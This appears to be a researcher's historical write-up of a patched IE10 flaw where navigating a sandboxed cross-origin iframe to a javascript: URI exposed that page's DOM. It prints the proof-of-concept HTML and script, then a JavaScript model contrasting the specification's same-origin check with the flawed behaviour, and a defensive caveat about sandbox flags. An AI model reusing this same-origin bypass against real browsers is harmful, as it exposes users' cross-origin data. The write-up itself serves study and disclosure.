I found that loading a cross-origin URL inside a sandboxed iframe and then setting window[0].location to a javascript: URI gave the attacker script execution in the iframe's context, with read access to the cross-origin document's body.outerHTML. The paradox is that the sandbox is what enables the bypass: without the sandbox attribute, a cross-origin javascript: navigation is refused under the same-origin policy; with it, the origin check was apparently skipped.
<!-- Cross-origin page loaded into a sandboxed frame. Only allow-scripts is set,
     not allow-same-origin, so the frame's document gets a unique origin and
     should be unreachable from the parent. -->
<iframe sandbox="allow-scripts" src="http://www.bing.com" width="700" height="150"></iframe>
<script>
  function main()
  {
    // window[0] is the first child frame. Navigating it to a javascript: URI
    // runs the script in the frame's own document, where document.URL and
    // document.body belong to the cross-origin page.
    window[0].location = "javascript:alert(document.URL + '\n\n' + document.body.outerHTML)";
  }
</script>
<input type="button" onclick="main()" value="Access iFrame DOM" />
Setting the sandboxed iframe's location to a javascript: URI ran the script inside the iframe with access to document.body.outerHTML of the cross-origin page, so its full DOM could be read. This worked on IE10 Metro (Windows 8 Release Preview). The same technique did not work against window.open targets, only against iframes in the same tab.
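To make the check that went wrong concrete, here is an added example of my own (not code from the original post, and not IE's implementation) that models the rule the HTML specification applies to a javascript: navigation: the navigating document must be same-origin with the target frame's active document, and a sandboxed frame without allow-same-origin has a unique (opaque) origin, so it is never same-origin with anything. The "buggy" variant only mirrors the behaviour described above (sandbox present, origin check skipped) and is an assumption, not IE's actual logic; the origins such as http://attacker.example and the parseSandbox/simulate helpers are likewise constructed for illustration.

```javascript
// Added example: a model of the same-origin check for javascript: navigations.
// Not from the original post; origins and helpers below are constructed for illustration.

// Sandbox keywords that matter for this scenario.
const SANDBOX_TOKENS = new Set(["allow-same-origin", "allow-scripts"]);

// Parse a sandbox="" attribute. null means the attribute is absent (frame not
// sandboxed); an empty string means sandboxed with no permissions restored.
// Tokens are ASCII-whitespace separated and case-insensitive.
function parseSandbox(attrValue) {
  if (attrValue === null || attrValue === undefined) {
    return { sandboxed: false, flags: new Set() };
  }
  const flags = new Set();
  for (const token of String(attrValue).trim().split(/[ \t\n\f\r]+/)) {
    const t = token.toLowerCase();
    if (SANDBOX_TOKENS.has(t)) flags.add(t);
  }
  return { sandboxed: true, flags };
}

// A tuple origin is (scheme, host, port); new URL() drops a default port.
function tupleOrigin(url) {
  const u = new URL(url);
  return { scheme: u.protocol.replace(":", ""), host: u.hostname, port: u.port };
}

// An opaque origin is same-origin only with itself, so each one gets a fresh id.
let opaqueCounter = 0;
function opaqueOrigin() {
  return { opaque: ++opaqueCounter };
}

// Origin of the document loaded into a frame: opaque whenever the frame is
// sandboxed without allow-same-origin, regardless of where it was loaded from.
function documentOrigin(url, sandbox) {
  if (sandbox.sandboxed && !sandbox.flags.has("allow-same-origin")) {
    return opaqueOrigin();
  }
  return tupleOrigin(url);
}

function isSameOrigin(a, b) {
  if (a.opaque !== undefined || b.opaque !== undefined) {
    return a.opaque !== undefined && a.opaque === b.opaque;
  }
  return a.scheme === b.scheme && a.host === b.host && a.port === b.port;
}

// Correct rule: a javascript: navigation is honoured only when the navigating
// document is same-origin with the target frame's active document. The
// target's sandbox flags play no part in the decision.
function allowJavascriptNavigation(sourceOrigin, targetOrigin) {
  return isSameOrigin(sourceOrigin, targetOrigin);
}

// Hypothetical model of the behaviour the post describes (not IE's code):
// the origin check is skipped whenever the target frame is sandboxed.
function allowJavascriptNavigationBuggy(sourceOrigin, targetOrigin, targetSandbox) {
  if (targetSandbox.sandboxed) return true;
  return isSameOrigin(sourceOrigin, targetOrigin);
}

// Simulate a parent page at parentUrl doing window[0].location = "javascript:..."
// on a frame whose document came from frameUrl with the given sandbox attribute.
function simulate(parentUrl, frameUrl, sandboxAttr) {
  const sandbox = parseSandbox(sandboxAttr);
  const parentOrigin = tupleOrigin(parentUrl);
  const frameOrigin = documentOrigin(frameUrl, sandbox);
  return {
    spec: allowJavascriptNavigation(parentOrigin, frameOrigin),
    buggy: allowJavascriptNavigationBuggy(parentOrigin, frameOrigin, sandbox),
  };
}

// The scenario from the post: attacker page, cross-origin frame, allow-scripts only.
const poc = simulate("http://attacker.example", "http://www.bing.com", "allow-scripts");
console.log("spec allows:", poc.spec, "| buggy model allows:", poc.buggy);
```

The model also shows a caveat worth knowing when writing defensive code: because the sandboxed frame's origin is opaque, even a parent on the same site cannot javascript:-navigate a sandboxed child unless allow-same-origin is set, so a frame that needs to be scripted from its parent must either drop the sandbox or restore same-origin access, and a frame that restores both allow-scripts and allow-same-origin gains nothing from the sandbox against a same-origin parent.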
Found during my years at Microsoft (2006–2014). These bugs were patched long ago and are shared here as a historical record, for learning purposes.